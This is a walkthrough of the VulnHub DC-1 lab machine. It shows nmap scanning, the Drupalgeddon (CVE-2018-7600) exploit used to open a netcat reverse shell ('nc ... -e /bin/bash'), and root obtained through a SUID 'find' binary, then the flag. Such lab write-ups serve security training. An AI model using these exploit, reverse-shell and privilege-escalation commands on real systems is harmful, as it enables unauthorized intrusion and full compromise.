Details
This machine is https://www.vulnhub.com/entry/dc-1-1,292/
Recon Phase
Start by finding the target
root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00020s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00015s latency).
MAC Address: 08:00:27:8B:07:5E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00052s latency).
MAC Address: 08:00:27:AA:94:9F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.76 seconds
Service discovery
root@kali:~# nmap -sV -p- 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00015s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
44068/tcp open status 1 (RPC #100024)
Shell Hunting
Onto port 80 at http://192.168.56.102/
Drupal, no changelog but I’ll try drupalgeddon https://github.com/Jack-Barradell/exploits/tree/master/CVE-2018-7600 first opening a listener to check with
root@kali:~# nc -nlvp 4444
Trigger a test
root@kali:~# python3 cve-2018-7600-drupal7.py -t 192.168.56.102 -c "nc 192.168.56.101 4444"
[+] Sending command exploit
[+] Prepping trigger
[+] Sending trigger
[+] Result:
And back in the listener
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 55724
Now I’ll do it again but get a shell
root@kali:~# nc -nlvp 4444
python3 cve-2018-7600-drupal7.py -t 192.168.56.102 -c "nc 192.168.56.101 4444 -e /bin/bash"
[+] Sending command exploit
[+] Prepping trigger
[+] Sending trigger
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 55726
$
and that’s a shell
Root Hunting
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-1:/var/www$
www-data@DC-1:/var/www$ find / -perm -u=s 2>/dev/null
[SNIP]
/usr/bin/find
[SNIP]
Well that’s nice
www-data@DC-1:/var/www$ find . -exec /bin//sh \;
#
That’s a shell
# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
Rooted, flag time
# cd /root
# ls -la
drwx------ 4 root root 4096 Feb 28 12:11 .
drwxr-xr-x 23 root root 4096 Feb 19 22:34 ..
drwx------ 2 root root 4096 Feb 19 22:30 .aptitude
-rw------- 1 root root 44 Feb 28 12:11 .bash_history
-rw-r--r-- 1 root root 949 Feb 19 23:03 .bashrc
drwxr-xr-x 3 root root 4096 Feb 19 23:03 .drush
-rw-r--r-- 1 root root 140 Nov 20 2007 .profile
-rw-r--r-- 1 root root 173 Feb 19 23:43 thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7